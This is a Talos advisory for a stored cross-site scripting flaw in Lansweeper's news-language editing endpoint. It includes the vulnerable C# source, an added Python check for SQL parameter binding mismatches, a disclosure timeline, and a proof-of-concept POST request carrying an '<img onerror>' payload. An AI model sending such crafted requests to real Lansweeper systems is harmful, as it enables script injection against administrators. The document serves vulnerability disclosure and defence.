Talos Vulnerability Report


Lansweeper lansweeper HdConfigActions.aspx altertextlanguages stored cross-site scripting vulnerability

December 1, 2022
CVE Number



A stored cross-site scripting vulnerability exists in the HdConfigActions.aspx altertextlanguages functionality of Lansweeper lansweeper. A specially-crafted HTTP request can lead to arbitrary JavaScript code injection. An attacker can send an HTTP request to trigger this vulnerability.


The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Lansweeper lansweeper


lansweeper - https://www.lansweeper.com/


9.1 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H


CWE-80 - Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)


Lansweeper is an IT Asset Management solution that gathers hardware and software information of computers and other devices on a computer network for management, compliance and audit purposes.

An exploitable stored XSS vulnerability is related to the action Configuration -> News page -> Alter language data, when any language other than English is chosen. The vulnerable code is located in the \LS\CF\HdConfigActions.cs file. Let us take a close look at the vulnerable source code:

Line 1 	int newsID = int.Parse(current.Request["id"]);
Line 2 	string reqType = current.Request["type"];
Line 3 	(...)
Line 4 		case "news":		
Line 5 			delteSQL  = "DELETE FROM htblnewsLang WHERE newsid = @p1";
Line 6 			insertSQL = "INSERT htblnewsLang (newsid, [language], description, [text]) VALUES (@p1,@p2,@p3,@p4)";		
Line 7 			break;
Line 8 		(...)
Line 9 		DB.ExecuteNonQuery(delteSQL, DB.NewDBParameter("@p1", newsID));
Line 10		foreach (Language langID in Enum.GetValues(typeof(Language)))
Line 11		{
Line 12			if (langID != Language.Eng)
Line 13			{
Line 14				DB.ExecuteNonQuery(insertSQL, DB.NewDBParameter("@p1", newsID), DB.NewDBParameter("@p2", (int)langID), DB.NewDBParameter("@p3", current.Request["lang" + (int)langID] ?? ""), DB.NewDBParameter("@p4", array[(int)(langID - 1)]), DB.NewDBParameter("@p5", (reqType == "news") ? HtmlSanitizer.SanitizeHtml(dictionary2[langID]) : dictionary2[langID]));
Line 15			}
Line 16		}

where part of the request looks like this:

POST /configuration/HdConfigActions.aspx?action=altertextlanguages&type=news&id=3 HTTP/1.1
lang1=eng_new&lang1x=eng_new_text&lang24=xss_entry&lang24x=<img src=1 onerror=alert(1)>	

During the news alter operation, a separate INSERT SQL query is executed for each language other than English (line 12). As you might notice, none of the passed news parameters is sanitized before insertion into the database:

description  - lang24=xss_entry
news text    - lang24x=<img src=1 onerror=alert(1)>

There is an attempt at sanitization made for parameter 5, but the news insert query has just 4 values. The news text does not seem to be sanitized during output either. The injected code will be triggered automatically each time a user attempts to edit this news item.
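
The binding mismatch described above can be caught mechanically. The following Python model is an added example, not Lansweeper or Talos code: it compares the placeholders in the report's INSERT statement with the parameter names bound on line 14 and shows which value is actually stored. The helper names and `toy_sanitize` (a stand-in for the product's HtmlSanitizer) are assumptions, as is the simplification that the values bound to @p4 and @p5 carry the same submitted text.

```python
import html
import re

# INSERT statement and parameter names as they appear in the report's listing.
INSERT_SQL = ("INSERT htblnewsLang (newsid, [language], description, [text]) "
              "VALUES (@p1,@p2,@p3,@p4)")
PLACEHOLDER = re.compile(r"@\w+")

# Constructed sample input, taken from the lang24 / lang24x fields of the request.
DESCRIPTION = "xss_entry"
TEXT = "<img src=1 onerror=alert(1)>"


def toy_sanitize(markup):
    """Stand-in for the product's HtmlSanitizer (assumption): escape all markup."""
    return html.escape(markup, quote=True)


def check_bindings(sql, bound):
    """Return (unused, missing): bound names the SQL never references, and
    placeholders in the SQL that have no bound value."""
    used = set(PLACEHOLDER.findall(sql))
    return sorted(set(bound) - used), sorted(used - set(bound))


def stored_row(sql, params):
    """Model the database side: only placeholders named in the SQL are stored."""
    return {name: params[name] for name in PLACEHOLDER.findall(sql)}


def bind_vulnerable(news_id, lang_id, description, text):
    # Models line 14 of the listing (assumed): raw text in @p4, sanitized in @p5.
    return {"@p1": news_id, "@p2": lang_id, "@p3": description,
            "@p4": text, "@p5": toy_sanitize(text)}


def bind_fixed(news_id, lang_id, description, text):
    # Neutralized values are bound to placeholders the statement really uses.
    return {"@p1": news_id, "@p2": lang_id,
            "@p3": toy_sanitize(description), "@p4": toy_sanitize(text)}


if __name__ == "__main__":
    for bind in (bind_vulnerable, bind_fixed):
        params = bind(3, 24, DESCRIPTION, TEXT)
        print(bind.__name__, check_bindings(INSERT_SQL, params),
              stored_row(INSERT_SQL, params)["@p4"])
```

A check of this kind belongs in code review or unit tests for data-access code: a bound parameter that the statement never references is a sign that validation was attached to the wrong value.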

Exploit Proof of Concept


POST /configuration/HdConfigActions.aspx?action=altertextlanguages&type=news&id=3 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 837
Connection: close
Cookie: UserSettings=language=24; ASP.NET_SessionId=s3bal3hgmqgscqihm3vxj5gt; custauth=username=hacker&userdomain=; __RequestVerificationToken_Lw__=zP2evPOU4gLNF/pF3R1XPsIP7ceImHsHKoqy7GfYwDnIwHnDJKt3r5 0bFTXNS/XpEAiyEFBVT2ekfSLIPgVMULtvi8Ae4qLSYcUO0UH90vcERUKMi72E3I2yEJexWSyNKlA8gcXlfMPYbc0a94Dji44b2cNn4aS0KGOSUQBn/0=

__VIEWSTATE=&lang1=eng_new&lang1x=eng_new_text&lang24=xss_entry&lang24x=<img src=1 onerror=alert(1)>&lang30=Magic&lang30x=<div style="font:12px Arial,Verdana;font-size:12px;font-family:Arial,Verdana;">Some news text<br style=""></div>&lang34=Magic&lang34x=<div style="font:12px Arial,Verdana;font-size:12px;font-family:Arial,Verdana;">Some news text<br style=""></div>&id=3&type=news&undefined=undefined&chksm=6740673596&__RequestVerificationToken=LCEp+vTDGHE23M5WuFdmjkRUlRS/DSdWiI/M7gs3RxuLXvxiMI9MiWihGndb3j1GaSLAhRww0iwriAEMcPmF4AzPEN50y2dmrSH3dUNVM+n0PtKlrw8vFGFigInLwkFYebmGC/fbz0Lo2lx7Myi0Ce2huzL/7QsGyGsj4We5WVg=


HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
x-frame-options: SAMEORIGIN
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Fri, 03 Jun 2022 09:01:34 GMT
Connection: close
Content-Length: 167


2022-06-27 - Vendor Disclosure
2022-11-29 - Vendor Patch Release
2022-12-01 - Public Release


Discovered by Marcin 'Icewall' Noga of Cisco Talos.